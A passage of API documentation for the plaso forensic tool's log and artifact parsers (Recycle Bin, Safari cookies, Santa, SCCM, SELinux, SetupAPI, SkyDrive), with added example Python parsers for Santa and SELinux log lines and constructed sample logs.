Type int
file_size
file size.
Type int
original_filename
filename.
Type str
record_index
index of the record on which the event is based.
Type int
short_filename
short filename.
Type str
DATA_TYPE = 'windows:metadata:deleted_item'
class plaso.parsers.recycler.WinRecycleBinParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parses the Windows $Recycle.Bin $I files.
DATA_FORMAT = 'Windows $Recycle.Bin $I file'
NAME = 'recycle_bin'
ParseFileObject(parser_mediator, file_object)
Parses a Windows Recycle.Bin metadata ($I) file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
class plaso.parsers.recycler.WinRecyclerInfo2Parser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parses the Windows Recycler INFO2 file.
DATA_FORMAT = 'Windows Recycler INFO2 file'
NAME = 'recycle_bin_info2'
ParseFileObject(parser_mediator, file_object)
Parses a Windows Recycler INFO2 file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.safari_cookies module
Parser for Safari Binary Cookie files.
class plaso.parsers.safari_cookies.BinaryCookieParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for Safari Binary Cookie files.
DATA_FORMAT = 'Safari Binary Cookie file'
classmethod GetFormatSpecification()
Retrieves the format specification for parser selection.
Returns format specification.
Return type FormatSpecification
NAME = 'binary_cookies'
ParseFileObject(parser_mediator, file_object)
Parses a Safari binary cookie file-like object.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• file_object (dfvfs.FileIO) – file-like object to be parsed.
Raises
• ParseError – when the page sizes array cannot be parsed.
• UnableToParseFile – when the file cannot be parsed, this will signal the event extractor to apply other parsers.
class plaso.parsers.safari_cookies.SafariBinaryCookieEventData
Bases: plaso.containers.events.EventData
Safari binary cookie event data.
cookie_name
cookie name.
Type str
cookie_value
cookie value.
Type str
flags
cookie flags.
Type int
path
path of the cookie.
Type str
url
URL where this cookie is valid.
Type str
DATA_TYPE = 'safari:cookie:entry'
plaso.parsers.santa module
Santa log (santa.log) parser.
class plaso.parsers.santa.SantaExecutionEventData
Bases: plaso.containers.events.EventData
Santa execution event data.
action
action recorded by Santa.
Type str
decision
whether the process was allowed or blocked.
Type str
reason
reason behind Santa's decision to execute or block a process.
Type str
process_hash
SHA256 hash for the executed process.
Type str
certificate_hash
SHA256 hash for the certificate associated with the executed process.
Type str
certificate_common_name
certificate common name.
Type str
pid
process id for the process.
Type str
ppid
parent process id for the executed process.
Type str
uid
user id associated with the executed process.
Type str
user
user name associated with the executed process.
Type str
gid
group id associated with the executed process.
Type str
group
group name associated with the executed process.
Type str
mode
Santa execution mode, for example Monitor or Lockdown.
Type str
process_path
process file path.
Type str
process_arguments
executed process with its arguments.
Type str
DATA_TYPE = 'santa:execution'
class plaso.parsers.santa.SantaFileSystemEventData
Bases: plaso.containers.events.EventData
Santa file system event data.
action
event type recorded by Santa.
Type str
file_path
file path and name for WRITE/DELETE events.
Type str
file_new_path
new file path and name for RENAME events.
Type str
pid
process id for the process.
Type str
ppid
parent process id for the executed process.
Type str
process
process name.
Type str
process_path
process file path.
Type str
uid
user id associated with the executed process.
Type str
user
user name associated with the executed process.
Type str
gid
group id associated with the executed process.
Type str
group
group name associated with the executed process.
Type str
DATA_TYPE = 'santa:file_system_event'
class plaso.parsers.santa.SantaMountEventData
Bases: plaso.containers.events.EventData
Santa mount event data.
action
event type recorded by Santa.
Type str
mount
disk mount point.
Type str
volume
disk volume name.
Type str
bsd_name
disk BSD name.
Type str
fs
disk volume kind.
Type str
model
disk model.
Type str
serial
disk serial.
Type str
bus
device protocol.
Type str
dmg_path
DMG file path.
Type str
appearance
disk appearance date.
Type str
DATA_TYPE = 'santa:diskmount'
class plaso.parsers.santa.SantaParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses Santa log files.
DATA_FORMAT = 'Santa log (santa.log) file'
LINE_STRUCTURES = [('execution_line', {{{{{{{{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "EXEC"} Suppress:("|")} {{Suppress:("decision=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("reason=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("sha256=") SkipTo:("|")} Suppress:("|")}} [{{Suppress:("cert_sha256=") SkipTo:("|")} Suppress:("|")}]} [{{Suppress:("cert_cn=") SkipTo:("|")} Suppress:("|")}]} [{{Suppress:("quarantine_url=") SkipTo:("|")} Suppress:("|")}]} {{Suppress:("pid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("ppid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("uid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("user=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("gid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("group=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} {{Suppress:("mode=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("path=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} [{Suppress:("args=") SkipTo:(lineEnd)}]}), ('file_system_event_line', {{{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} {{"WRITE" ^ "RENAME"} ^ "DELETE"}} Suppress:("|")} {{Suppress:("path=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} [{{Suppress:("newpath=") SkipTo:("|")} Suppress:("|")}]} {{Suppress:("pid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("ppid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("process=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("processpath=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("uid=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("user=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("gid=") SkipTo:("|")} Suppress:("|")}} 
{{Suppress:("group=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}}), ('mount_line', {{{{{{{{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "DISKAPPEAR"} Suppress:("|")} {{Suppress:("mount=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("volume=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bsdname=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}} {{Suppress:("fs=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("model=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("serial=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bus=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("dmgpath=") SkipTo:("|")} Suppress:("|")}} {Suppress:("appearance=") SkipTo:(lineEnd)}}), ('umount_line', {{{{{{{Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) Suppress:("I santad:")} Suppress:("action=")} "DISKDISAPPEAR"} Suppress:("|")} {{Suppress:("mount=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("volume=") SkipTo:("|")} Suppress:("|")}} {{Suppress:("bsdname=") {SkipTo:("|") | SkipTo:(lineEnd)}} [Suppress:("|")]}}), ('quota_exceeded_line', {Combine:({{{{{{{{{{{{{{{Suppress:("[") W:(0123...)} "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} "Z"} Suppress:("]")}) "*** LOG MESSAGE QUOTA EXCEEDED - SOME MESSAGES FROM THIS PROCESS HAVE BEEN DISCARDED ***"})]
MAX_LINE_LENGTH = 16384
NAME = 'santa'
ParseRecord(parser_mediator, key, structure)
Parses a matching entry.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – elements parsed from the file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verifies that this is a Santa log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
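The line shapes listed in LINE_STRUCTURES above (EXEC, WRITE/RENAME/DELETE, DISKAPPEAR/DISKDISAPPEAR and the quota marker), parsed as an added example that is not plaso's SantaParser: each line is a bracketed ISO 8601 UTC timestamp, the literal "I santad:" and "|"-separated key=value fields, and the example maps the log keys to the event data attributes documented above (sha256 to process_hash, bsdname to bsd_name, and so on). The sample lines, the mode values "M" and "L" and the blocked_executions helper are constructed for this example.

```python
"""Santa log line parser (added example, not plaso's SantaParser).

Follows the line shapes in LINE_STRUCTURES above.  The sample lines and the
mode values "M"/"L" are constructed for this example.
"""
import re
from datetime import datetime, timezone

LINE_RE = re.compile(r'^\[(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+Z)\] (.*)$')
QUOTA_MARKER = '*** LOG MESSAGE QUOTA EXCEEDED'

# key in the log line -> attribute name of the event data, per action group.
EXEC_FIELDS = {
    'decision': 'decision', 'reason': 'reason', 'sha256': 'process_hash',
    'cert_sha256': 'certificate_hash', 'cert_cn': 'certificate_common_name',
    'pid': 'pid', 'ppid': 'ppid', 'uid': 'uid', 'user': 'user', 'gid': 'gid',
    'group': 'group', 'mode': 'mode', 'path': 'process_path',
    'args': 'process_arguments'}
FILE_FIELDS = {
    'path': 'file_path', 'newpath': 'file_new_path', 'pid': 'pid',
    'ppid': 'ppid', 'process': 'process', 'processpath': 'process_path',
    'uid': 'uid', 'user': 'user', 'gid': 'gid', 'group': 'group'}
MOUNT_FIELDS = {
    'mount': 'mount', 'volume': 'volume', 'bsdname': 'bsd_name', 'fs': 'fs',
    'model': 'model', 'serial': 'serial', 'bus': 'bus', 'dmgpath': 'dmg_path',
    'appearance': 'appearance'}
ACTIONS = {
    'EXEC': ('santa:execution', EXEC_FIELDS),
    'WRITE': ('santa:file_system_event', FILE_FIELDS),
    'RENAME': ('santa:file_system_event', FILE_FIELDS),
    'DELETE': ('santa:file_system_event', FILE_FIELDS),
    'DISKAPPEAR': ('santa:diskmount', MOUNT_FIELDS),
    'DISKDISAPPEAR': ('santa:diskmount', MOUNT_FIELDS)}


def split_fields(body):
  """Splits "k=v|k=v|args=..." into a dict; args keeps any "|" it contains."""
  args = None
  marker = body.find('|args=')
  if marker != -1:
    args = body[marker + len('|args='):]  # args= runs to end of line
    body = body[:marker]
  fields = {}
  for token in body.split('|'):
    key, sep, value = token.partition('=')
    if sep:
      fields[key] = value
  if args is not None:
    fields['args'] = args
  return fields


def parse_line(line):
  """Returns an event dict, or None for quota markers and unknown lines."""
  match = LINE_RE.match(line.rstrip('\n'))
  if not match:
    return None
  body = match.group(2)
  if body.startswith(QUOTA_MARKER):
    return None  # santad dropped messages here; nothing to extract
  if not body.startswith('I santad: '):
    return None
  fields = split_fields(body[len('I santad: '):])
  action = fields.get('action')
  if action not in ACTIONS:
    return None
  data_type, mapping = ACTIONS[action]
  timestamp = datetime.strptime(match.group(1), '%Y-%m-%dT%H:%M:%S.%fZ')
  event = {'data_type': data_type, 'action': action,
           'timestamp': timestamp.replace(tzinfo=timezone.utc)}
  for key, attribute in mapping.items():
    if key in fields:
      event[attribute] = fields[key]
  return event


def parse_santa_log(text):
  events = [parse_line(line) for line in text.splitlines()]
  return [event for event in events if event is not None]


def blocked_executions(events):
  """Executions Santa denied: the entries worth reviewing first in triage."""
  return [e for e in events
          if e['data_type'] == 'santa:execution' and e.get('decision') == 'DENY']


# Constructed sample lines; hashes and names are placeholders.
SAMPLE_LOG = """\
[2020-10-07T09:15:02.123Z] I santad: action=EXEC|decision=ALLOW|reason=CERT|sha256=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef|cert_sha256=fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210|cert_cn=Software Signing|pid=4242|ppid=1|uid=501|user=alice|gid=20|group=staff|mode=M|path=/usr/bin/curl|args=curl https://example.org/
[2020-10-07T09:15:05.456Z] I santad: action=EXEC|decision=DENY|reason=UNKNOWN|sha256=ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff|pid=4243|ppid=4242|uid=501|user=alice|gid=20|group=staff|mode=L|path=/Users/alice/Downloads/installer|args=installer --silent | tee log
[2020-10-07T09:16:00.000Z] I santad: action=WRITE|path=/Users/alice/Downloads/installer|pid=4242|ppid=1|process=curl|processpath=/usr/bin/curl|uid=501|user=alice|gid=20|group=staff
[2020-10-07T09:17:30.789Z] I santad: action=DISKAPPEAR|mount=|volume=USBDRIVE|bsdname=disk2s1|fs=msdos|model=Generic Flash Disk|serial=0123456789|bus=USB|dmgpath=|appearance=2020-10-07T09:17:30.000Z
[2020-10-07T09:18:00.000Z] *** LOG MESSAGE QUOTA EXCEEDED - SOME MESSAGES FROM THIS PROCESS HAVE BEEN DISCARDED ***
"""

if __name__ == '__main__':
  for event in blocked_executions(parse_santa_log(SAMPLE_LOG)):
    print(event['timestamp'].isoformat(), event['process_path'], event['reason'])
```

The args field is taken from its marker to the end of the line rather than split on "|", matching the grammar's SkipTo(lineEnd) for args=; a naive split would truncate command lines that contain a pipe. Quota-exceeded markers are worth keeping in mind during review: they mean santad discarded messages, so the absence of an event around that timestamp is not evidence that nothing happened.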
plaso.parsers.sccm module
Parser for SCCM Logs.
class plaso.parsers.sccm.SCCMLogEventData
Bases: plaso.containers.events.EventData
SCCM log event data.
component
component.
Type str
text
text.
Type str
DATA_TYPE = 'software_management:sccm:log'
class plaso.parsers.sccm.SCCMParser
Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser
Parser for Windows System Center Configuration Manager (SCCM) logs.
BUFFER_SIZE = 16384
DATA_FORMAT = 'System Center Configuration Manager (SCCM) client log file'
LINE_GRAMMAR_BASE = {{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)}
LINE_GRAMMAR_OFFSET = {{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} Re:('[-+]\\d{2,3}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)}
LINE_STRUCTURES = [('log_entry', {{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)} Re:('.*?(?=(\\<!\\[LOG\\[))')}), ('log_entry_at_end', {{{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)} rest of line} lineEnd}), ('log_entry_offset', {{{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} Re:('[-+]\\d{2,3}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)} Re:('.*?(?=(\\<!\\[LOG\\[))')}), ('log_entry_offset_at_end', {{{{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} Re:('[-+]\\d{2,3}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)} rest of line} lineEnd})]
NAME = 'sccm'
ParseRecord(parser_mediator, key, structure)
Parse the record and return an SCCM log event object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, lines)
Verifies whether content corresponds to an SCCM log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• lines (str) – one or more lines from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.selinux module
This file contains the SELinux audit log (audit.log) file parser.
Information updated 16 January 2013.
An example:
type=AVC msg=audit(1105758604.519:420): avc: denied { getattr } for pid=5962 comm="httpd" path="/home/auser/public_html" dev=sdb2 ino=921135
Where msg=audit(1105758604.519:420) contains the number of seconds since January 1, 1970 00:00:00 UTC and the number of milliseconds after the dot, for example: “seconds: 1105758604, milliseconds: 519”.
The number after the timestamp (420 in the example) is a ‘serial number’ that can be used to correlate multiple logs generated from the same event.
References:
• http://selinuxproject.org/page/NB_AL
• http://blog.commandlinekungfu.com/2010/08/episode-106-epoch-fail.html
• http://www.redhat.com/promo/summit/2010/presentations/taste_of_training/Summit_2010_SELinux.pdf
class plaso.parsers.selinux.SELinuxLogEventData
Bases: plaso.containers.events.EventData
SELinux log event data.
audit_type
audit type.
Type str
body
body of the log line.
Type str
pid
process identifier (PID) that created the SELinux log line.
Type int
DATA_TYPE = 'selinux:line'
class plaso.parsers.selinux.SELinuxParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parser for SELinux audit log (audit.log) files.
DATA_FORMAT = 'SELinux audit log (audit.log) file'
LINE_STRUCTURES = [('line', Dict:({{Group:({{"type" Suppress:("=")} {W:(ABCD...) ^ Re:('UNKNOWN\\[[0-9]+\\]')}}) Group:({{{{{{{"msg" Suppress:("=audit(")} W:(0123...)} Suppress:(".")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:("):")})} Group:({Empty rest of line})}))]
NAME = 'selinux'
ParseRecord(parser_mediator, key, structure)
Parses a structure of tokens derived from a line of a text file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verifies if a line from a text file is in the expected format.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
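The audit.log line format explained in this module, parsed as an added example that is not plaso's SELinuxParser: the grammar above groups a line into the audit type (a word, or UNKNOWN[n]), the msg=audit(<seconds>.<fraction>:<serial>) stamp and the body, and the serial is what lets records of one event be correlated. The sample lines other than the documented AVC line, and the group_by_serial and denials helpers, are constructed for this example.

```python
"""SELinux audit.log line parser (added example, not plaso's SELinuxParser).

Sample lines other than the documented AVC line are constructed.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r'^type=(?P<audit_type>[A-Za-z_]+|UNKNOWN\[[0-9]+\]) '
    r'msg=audit\((?P<seconds>\d+)\.(?P<fraction>\d+):(?P<serial>\d+)\):\s*'
    r'(?P<body>.*)$')
PID_RE = re.compile(r'\bpid=(\d+)')


def parse_line(line):
  """Returns an event dict or None when the line is not an audit record."""
  match = LINE_RE.match(line.rstrip('\n'))
  if not match:
    return None
  fraction = match.group('fraction')
  if len(fraction) > 6:
    return None  # finer than microseconds: not a format we recognise
  # "519" is milliseconds; scale whatever width is present to microseconds.
  micro = int(fraction) * 10 ** (6 - len(fraction))
  body = match.group('body')
  pid_match = PID_RE.search(body)
  return {
      'data_type': 'selinux:line',
      'timestamp_us': int(match.group('seconds')) * 1000000 + micro,
      'serial': int(match.group('serial')),
      'audit_type': match.group('audit_type'),
      'body': body,
      'pid': int(pid_match.group(1)) if pid_match else None}


def parse_audit_log(text):
  return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def group_by_serial(events):
  """Groups records that share an audit serial: they describe one event."""
  groups = defaultdict(list)
  for event in events:
    groups[event['serial']].append(event)
  return dict(groups)


def denials(events):
  """AVC records whose body reports a denial; a triage starting point."""
  return [e for e in events
          if e['audit_type'] == 'AVC' and e['body'].startswith('avc: denied')]


# Constructed sample: the documented AVC line, a SYSCALL record with the same
# serial, an unrelated granted record and an UNKNOWN[n] record.
SAMPLE_LOG = """\
type=AVC msg=audit(1105758604.519:420): avc: denied { getattr } for pid=5962 comm="httpd" path="/home/auser/public_html" dev=sdb2 ino=921135
type=SYSCALL msg=audit(1105758604.519:420): arch=40000003 syscall=195 success=no exit=-13 pid=5962 comm="httpd"
type=AVC msg=audit(1105758700.042:421): avc: granted { setenforce } for pid=6001 comm="setenforce"
type=UNKNOWN[1327] msg=audit(1105758700.100:422): proctitle=2F7573722F7362696E2F687474706400
not an audit record
"""

if __name__ == '__main__':
  for serial, group in sorted(group_by_serial(parse_audit_log(SAMPLE_LOG)).items()):
    print(serial, [e['audit_type'] for e in group])
```

Scaling the fraction by its width rather than assuming three digits keeps the timestamp correct if a producer ever writes more or fewer digits; two records with identical seconds and serial but different fraction widths would otherwise sort apart.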
plaso.parsers.setupapi module
Parser for Windows Setupapi log files.
The format is documented at: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/setupapi-text-logs
class plaso.parsers.setupapi.SetupapiLogEventData
Bases: plaso.containers.events.EventData
Setupapi log event data.
entry_type
log entry type, for example “Device Install - PCI\VEN_104C&DEV_8019&SUBSYS_8010104C&REV_00\3&61aaa01&0&38” or “Sysprep Respecialize - {804b345a-ffd7-854c-a1b5-ca9598907846}”.
Type str
exit_status
the exit status of the logged operation.
Type str
DATA_TYPE = 'setupapi:log:line'
class plaso.parsers.setupapi.SetupapiLogParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses events from Windows Setupapi log files.
DATA_FORMAT = 'Windows SetupAPI log file'
LINE_STRUCTURES = [('ignorable_line', {{"[Boot Session:" Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} "]"}), ('ignorable_line', {"[BeginLog]" lineEnd}), ('ignorable_line', {"[Device Install Log]" lineEnd}), ('ignorable_line', {{stringStart {" . " | "!!! " | "! " | " "}} rest of line}), ('ignorable_line', {{stringStart {"!!! " | "! " | " "}} rest of line}), ('section_end', {{Suppress:("<<< Section end ") Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} lineEnd}), ('section_end_exit_status', {{{Suppress:("<<< [Exit status: ") !W:(])} "]"} lineEnd}), ('section_header', {{{Suppress:(">>> [") !W:(])} "]"} lineEnd}), ('section_start', {{Suppress:(">>> Section start") Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} lineEnd})]
NAME = 'setupapi'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a log entry.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verify that this file is a Windows Setupapi log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – single line from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.skydrivelog module
This file contains the SkyDrive log file parser in plaso.
class plaso.parsers.skydrivelog.SkyDriveLogEventData
Bases: plaso.containers.events.EventData
SkyDrive log event data.
detail
details.
Type str
log_level
log level.
Type str
module
name of the module that generated the log message.
Type str
source_code
source file and line number that generated the log message.
Type str
DATA_TYPE = 'skydrive:log:line'
class plaso.parsers.skydrivelog.SkyDriveLogParser
Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser
Parses SkyDrive log files.
DATA_FORMAT = 'OneDrive (or SkyDrive) log file'
IGNORE_FIELD = Suppress:(!W:(,))
LINE_STRUCTURES = [('logline', {{{{{{{{{{{{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:(",")} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} !W:(,)} Suppress:(",")} !W:(,)} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} !W:(,)} Suppress:(",")} SkipTo:({{StringEnd | {Suppress:("######") "Logging started."}} | {{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:(",")} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}})} [lineEnd]...}), ('header', {{{{{{{{Suppress:("######") "Logging started."} "Version="} W:(0123...)} Suppress:("StartSystemTime:")} Group:({{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} W:(0123...)} Suppress:(".")} W:(0123...)})} "StartLocalTime:"} SkipTo:(lineEnd)} lineEnd})]
MSEC = W:(0123...)
NAME = 'skydrive_log'
ParseRecord(parser_mediator, key, structure)
Parse each record structure and return an EventObject if applicable.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, lines)
Verify that this file is a SkyDrive log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• lines (str) – one or more lines from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
class plaso.parsers.skydrivelog.SkyDriveOldLogEventData
Bases: plaso.containers.events.EventData
SkyDrive old log event data.
log_level
log level.
Type str
source_code
source file and line number that generated the log message.
Type str
text
log message.
Type str
DATA_TYPE = 'skydrive:log:old:line'
class plaso.parsers.skydrivelog.SkyDriveOldLogParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parse SkyDrive old log files.
DATA_FORMAT = 'OneDrive (or SkyDrive) old log file'
LINE_STRUCTURES = [('logline', {{{{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}}) Combine:({{{{!W:(:) ":"} W:(0123...)} "!"} W:(0123...)})} {{Suppress:("(") SkipTo:(")")} Suppress:(")")}} ":"} SkipTo:(lineEnd)}), ('no_header_single_line', {{~{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}})} [Suppress:("->")]} SkipTo:(lineEnd)})]
NAME = 'skydrive_log_old'
ParseRecord(parser_mediator, key, structure)
Parse each record structure and return an EventObject if applicable.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verify that this file is a SkyDrive old log file.
Parameters
